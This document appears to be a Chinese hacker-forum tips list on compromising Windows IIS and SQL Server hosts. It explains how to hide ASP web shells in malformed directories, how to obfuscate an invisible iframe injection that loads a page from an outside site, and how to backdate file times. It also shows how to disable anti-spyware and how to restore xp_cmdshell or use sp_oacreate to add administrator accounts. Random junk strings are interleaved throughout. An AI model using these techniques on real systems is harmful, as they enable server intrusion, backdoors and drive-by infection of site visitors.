拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
0 `( a; m4 V+ g+ `7 o3 w通过web访问ASP木马:http://ip/images../news.asp?action=login
7 {- o* |1 N! Z% y* m- E如何删除非标准目录:rmdir images..\ /s ^( }2 }2 ?* M2 X
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:# ]8 `. j3 T0 f4 ^9 b2 F4 X
mkdir programme.asp
/ H3 X7 z x9 a6 A1 y" b R新建1.txt文件内容:<!--#include file=”12.jpg”-->
i `; H6 n3 U* ~新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
2 X U6 t8 g) q- b m" D. K# P! pattrib +H +S programme.asp6 e0 o* ~; ?1 J: A( e1 x
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
6 q+ b, ^! c3 w# o! p* \8 v% W6 ?0 }+ a; |3 R0 L- p
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。" E: ]4 k% r* Q7 X4 W1 d; C& C
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。& X/ R: w9 o% l$ ~5 k+ p
' W7 y% I! k5 c
55、JS隐蔽挂马1 V- o6 t5 a: }& Z
1.
/ s0 d+ b, g1 [ H+ f$ T5 qvar tr4c3="<iframe src=ht";4 W. W8 r8 p# G- Q
tr4c3 = tr4c3+"tp:/";
9 {( ^+ J- C/ @( ~, I: F9 d$ etr4c3 = tr4c3+"/ww";3 w" W- h" a* k$ K
tr4c3 = tr4c3+"w.tr4";
5 l) t: H5 _) [tr4c3 = tr4c3+"c3.com/inc/m";- L+ n% M# O( F: A9 @- C# S
tr4c3 = tr4c3+"m.htm style="display:none"></i";
/ X. M7 R* {- u7 k) I, m% Qtr4c3 =tr4c3+"frame>'";- f0 Y$ S4 m" m' b+ H- i H
document.write(tr4c3);
/ C: P1 U0 h9 I* X, B避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。7 R+ e/ ?5 c" h
) `7 a/ j: K5 \; Q% s p- m7 R1 `2.
: Y, H7 L' g: Z( t转换进制,然后用EVAL执行。如8 s9 D0 ]# `/ R, o
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
; j* @" i: |% Y; k+ u# R不过这个有点显眼。
, r+ ~; G9 m4 A' l: v$ b3." l- e7 ^2 y# |9 N& B/ m
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');0 c+ W* B ?$ P- U6 o
最后一点,别忘了把文件的时间也修改下。6 ?- v( @. `( N
2 G" H4 ?- k5 O6 P/ j
56.3389终端入侵常用DOS命令0 n8 f8 [, w. V# K
taskkill taskkill /PID 1248 /t
" `! V1 o; x# F
! r8 E8 \0 Q* r( e, C1 Mtasklist 查进程
% T7 K$ a' }2 r0 r# b7 C3 e3 ]1 d, `
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限3 A7 z9 o! Z6 y* Q$ Q e
iisreset /reboot, a6 Y/ p9 T) a4 N/ d3 s& X
tsshutdn /reboot /delay:1 重起服务器( K* ~, X+ b$ o! p* U7 b5 W
& {4 I, a/ f: f, W7 p$ S
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,# X, }& Q# K O! c
: s) F2 R' g% `5 K8 U' ~query user 查看当前终端用户在线情况
6 P2 l6 l/ R4 @( y2 @# B9 h
' J* U0 Z6 D) P) S* F要显示有关所有会话使用的进程的信息,请键入:query process *5 P: |) d6 l9 K9 H, ~
@: s/ G2 v$ a/ L要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:24 @# A9 p6 z5 I+ n$ F1 z8 J
8 S" m; L& i2 J- G' P8 y
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
5 d! X! n) Q' G8 c a9 g' ]6 e6 Q5 f1 a1 e. T/ m5 C# V ]
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
$ G0 g) J; [2 J4 u- P6 M
: I. ]7 t# Z& l, b- `3 \; {2 v* I命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启. i7 G& J) k2 o# n9 t/ [
# \2 w/ Q2 j0 {7 p
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统/ z7 t* q% A) [8 }, l4 Q
- r; p: ^$ W* n, y$ l命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
* b3 }" l" c+ J" E5 g* t8 U
7 T7 @! G9 B" N命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
2 K f0 }- y9 j' W7 J$ u( Z" j
5 p% f* u& q5 ^- d6 A56、在地址栏或按Ctrl+O,输入:8 R1 B5 B, r& U
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
+ K1 l& g6 H8 O- M" N- H C+ D. y# h N) t" q1 m; R) A2 q
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。: R7 }* M$ b% e: H9 A
9 H; w& Z% H: R8 Y: c( V57、net user的时候,是不能显示加$的用户,但是如果不处理的话,5 |! o' l( q/ B- [% V; T' |
用net localgroup administrators是可以看到管理组下,加了$的用户的。
1 ~2 j t, F% G, L. Y6 W" C" X( Q* I& S; V D. I3 g
58、 sa弱口令相关命令
, A% f5 ^, s" j5 v( l, b! b
' W+ w" z' M, W4 c8 q0 d) m0 H一.更改sa口令方法:
4 \7 K- g1 j/ W$ Q+ U, h1 ]3 ~用sql综合利用工具连接后,执行命令:% B. O" ? V' A( O6 g! j
exec sp_password NULL,'20001001','sa'
, y2 e8 B! \1 @5 d8 a(提示:慎用!)
" \/ n r( {7 e$ i! K
6 X4 x& Y* z% c& S+ H g( u二.简单修补sa弱口令.
* N9 p7 X+ R1 ?$ K7 O! |: ?' N& x$ Q: e3 ~9 s
方法1:查询分离器连接后执行:
3 I- q* d F8 t) E8 F lif exists (select * from2 A @; \& a6 x& k; ~9 _
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and" u. ]7 ^9 b9 T: S, a
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
- a3 E N2 M# ~; I2 g" A2 X
5 Z R+ A, n. b# H" }1 Z9 K" yexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'* r( o" l1 G9 j! I; d8 {* L' v, l
4 l: H; z9 P4 Y G3 i% {
GO
$ ~0 k8 J: m$ H! ?/ W5 u p
l& E$ o) ?2 J" A8 J9 Q然后按F5键命令执行完毕* w( k* a. d" j6 @
( m' ]) @+ D# x$ T% K
方法2:查询分离器连接后
7 B6 h$ D2 {7 m/ f3 z第一步执行:use master8 E9 L" {! W% e. ^+ I$ _( n& c
第二步执行:sp_dropextendedproc 'xp_cmdshell'
4 Z# r$ t4 {" Z3 G& G p, T然后按F5键命令执行完毕2 J1 A6 H8 A6 \$ ^2 w t% E
6 D2 g+ s" U$ F/ P! ]
* r1 s+ I) Q) q/ L( \. k" w# u三.常见情况恢复执行xp_cmdshell.
, i; b; ]- i0 m8 ?2 P" N/ y- a# j2 z% B
6 ?* ~) W, c. s! ^5 l
1 未能找到存储过程'master..xpcmdshell'.
: N; V- ]+ K9 |: e, T) R6 F& F7 o 恢复方法:查询分离器连接后,
$ z4 [6 E4 J: T$ I7 w' E+ }8 @' S9 \第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int K y1 a. H8 b) v8 A0 Z4 o' p. [9 x0 N
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'/ b# o8 _+ v i/ I5 K+ g
然后按F5键命令执行完毕
9 D/ N# M$ U0 @- R1 I
+ ]6 ]; k: t% C/ l5 T5 ~2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
' }+ U( T& `- _- M& O0 k/ l恢复方法:查询分离器连接后,1 \6 U: m6 z3 X6 y
第一步执行:sp_dropextendedproc "xp_cmdshell"
8 d4 }/ ~* Q8 u第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'( F# w: ~5 V5 o) C- H \( q' P, A
然后按F5键命令执行完毕2 y5 y2 h' R2 S( N3 A
+ ` m! ]- n0 X4 [9 T+ f9 B K+ l
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)$ J; i# w$ L. v: v3 t) ~
恢复方法:查询分离器连接后,( h% O: _8 Q0 \( Z1 h8 p
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'( i' P% o2 B8 ?& K
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
7 ?0 B: x2 |" c( N然后按F5键命令执行完毕- H% {# t$ y8 k/ i$ ]
* K3 |( ^$ C( y2 q四.终极方法.
I: L' e( f' O7 T. h5 n如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
" _, Q G q+ ]查询分离器连接后,
% v0 w: y" {) j, N$ h3 M* V2000servser系统:
6 y; f% `4 o& }' `. _declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
; U8 P/ i$ Q0 R7 W- z
& f: q7 F7 ?8 r$ s7 y4 odeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add': N( O1 X4 [5 n: H% W9 v% i/ e
# h: m" w; e$ w' L
xp或2003server系统:0 d5 p! N8 ], Y3 J$ s# X
/ T+ B/ `/ x7 G4 Q$ e
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'% m# C t0 R; A1 V9 x8 B, k( N
4 w8 X: n1 R2 I' D9 x) v( H
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
* L* G5 z3 ~* k# [( k |